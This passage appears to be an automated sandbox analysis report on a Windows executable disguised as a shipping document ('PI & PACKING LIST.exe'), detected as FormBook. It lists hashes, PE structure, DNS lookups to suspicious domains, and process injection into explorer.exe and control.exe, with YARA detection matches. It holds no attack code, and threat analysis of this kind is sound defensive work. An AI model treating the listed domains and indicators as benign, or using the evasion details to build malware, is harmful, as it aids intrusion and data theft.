                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
Simulations (behavior and APIs):
Time | Type | Description
01:55:06 | API Interceptor | 1x Sleep call for process: PI & PACKING LIST.exe modified

Created / dropped files:
                                                        Process:C:\Users\user\Desktop\PI & PACKING LIST.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Process: C:\Windows\SysWOW64\control.exe
File Type: SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category: dropped
Size (bytes): 94208
Entropy (8bit): 1.2882898331044472
Encrypted: false
SSDEEP: 192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5: 4822E6A71C88A4AB8A27F90192B5A3B3
SHA1: CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256: A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512: C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious: false
Reputation: high, very likely benign file
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.599851542938325
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: PI & PACKING LIST.exe
File size: 1030144
MD5: 36fbb21511e87e8dddc8916cc2dc9367
SHA1: eda2fa3fe4b62fe3d564cf492cc31a875e8f1922
SHA256: 937c7c476bb363e55fdf1ff275c87de91ec0f550072e9a759387cc95e6c78c83
SHA512: 85aa4905d89f42acc75d9a31806d16a84ffca0bbd4aaf9b9605d98adc8ff66544616afd8705c9c5295a9153930f1be1d58c6556f9c244e1be163218c42336dc7
SSDEEP: 24576:s1uqqdOC2CIep1Vtcl6gIGVfeSvopbGCh9XV:sbqdO+IAInVnFCh9X
TLSH: 06256BCB2F300E84CB5F34715C8D1B8861823DA149F59CF22B756A786E564FFA69227C
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.|c..............0.................. ........@.. ....................... ............@................................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x4fccde
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x637CBC3E [Tue Nov 22 12:10:38 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xfcc8c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xfe000          0x388         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x100000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xfae0c       0xfb000   False     0.8133160716508964  data       7.603845618377083    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xfe000          0x388         0x400     False     0.3818359375        data       2.865449669398995    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x100000         0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name        RVA      Size   Type  Language  Country
RT_VERSION  0xfe058  0x32c  data

DLL          Import
mscoree.dll  _CorExeMain
Timestamp                            Source IP    Dest IP      Trans ID  OP Code             Name                  Type            Class        DNS over HTTPS
Nov 30, 2022 01:56:25.364172935 CET  192.168.2.3  8.8.8.8      0x79b8    Standard query (0)  www.gebouwpas.online  A (IP address)  IN (0x0001)  false
Nov 30, 2022 01:56:30.406841040 CET  192.168.2.3  8.8.8.8      0x2c63    Standard query (0)  www.zkjk888.com       A (IP address)  IN (0x0001)  false
Nov 30, 2022 01:56:35.953828096 CET  192.168.2.3  8.8.8.8      0x2c27    Standard query (0)  www.cpitherapy.com    A (IP address)  IN (0x0001)  false
Nov 30, 2022 01:56:46.184161901 CET  192.168.2.3  8.8.8.8      0xbf1a    Standard query (0)  www.p-soils.com       A (IP address)  IN (0x0001)  false
Nov 30, 2022 01:56:56.621620893 CET  192.168.2.3  8.8.8.8      0xd877    Standard query (0)  www.bengalindex.com   A (IP address)  IN (0x0001)  false
Nov 30, 2022 01:57:05.922028065 CET  192.168.2.3  8.8.8.8      0x7a2e    Standard query (0)  www.nu2uresale.store  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                  CName                 Address          Type                    Class        DNS over HTTPS
Nov 30, 2022 01:56:25.383728981 CET  8.8.8.8    192.168.2.3  0x79b8    Name error (3)  www.gebouwpas.online  none                  none             A (IP address)          IN (0x0001)  false
Nov 30, 2022 01:56:30.430402040 CET  8.8.8.8    192.168.2.3  0x2c63    No error (0)    www.zkjk888.com                             35.78.89.117     A (IP address)          IN (0x0001)  false
Nov 30, 2022 01:56:36.071085930 CET  8.8.8.8    192.168.2.3  0x2c27    No error (0)    www.cpitherapy.com                          178.128.239.245  A (IP address)          IN (0x0001)  false
Nov 30, 2022 01:56:46.442496061 CET  8.8.8.8    192.168.2.3  0xbf1a    No error (0)    www.p-soils.com                             162.43.120.154   A (IP address)          IN (0x0001)  false
Nov 30, 2022 01:56:56.653685093 CET  8.8.8.8    192.168.2.3  0xd877    No error (0)    www.bengalindex.com   ghs.googlehosted.com                   CNAME (Canonical name)  IN (0x0001)  false
Nov 30, 2022 01:56:56.653685093 CET  8.8.8.8    192.168.2.3  0xd877    No error (0)    ghs.googlehosted.com                        142.250.203.115  A (IP address)          IN (0x0001)  false
Nov 30, 2022 01:57:06.161883116 CET  8.8.8.8    192.168.2.3  0x7a2e    No error (0)    www.nu2uresale.store                        209.99.64.33     A (IP address)          IN (0x0001)  false

Target ID: 0
Start time: 01:55:00
Start date: 30/11/2022
Path: C:\Users\user\Desktop\PI & PACKING LIST.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\PI & PACKING LIST.exe
Imagebase: 0xd0000
File size: 1030144 bytes
MD5 hash: 36FBB21511E87E8DDDC8916CC2DC9367
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 1
Start time: 01:55:08
Start date: 30/11/2022
Path: C:\Users\user\Desktop\PI & PACKING LIST.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\PI & PACKING LIST.exe
Imagebase: 0x3a0000
File size: 1030144 bytes
MD5 hash: 36FBB21511E87E8DDDC8916CC2DC9367
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 2
Start time: 01:55:08
Start date: 30/11/2022
Path: C:\Users\user\Desktop\PI & PACKING LIST.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\PI & PACKING LIST.exe
Imagebase: 0x720000
File size: 1030144 bytes
MD5 hash: 36FBB21511E87E8DDDC8916CC2DC9367
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

Target ID: 3
Start time: 01:55:10
Start date: 30/11/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff69fe90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

Target ID: 13
Start time: 01:55:49
Start date: 30/11/2022
Path: C:\Windows\SysWOW64\control.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\control.exe
Imagebase: 0x1360000
File size: 114688 bytes
MD5 hash: 40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

No disassembly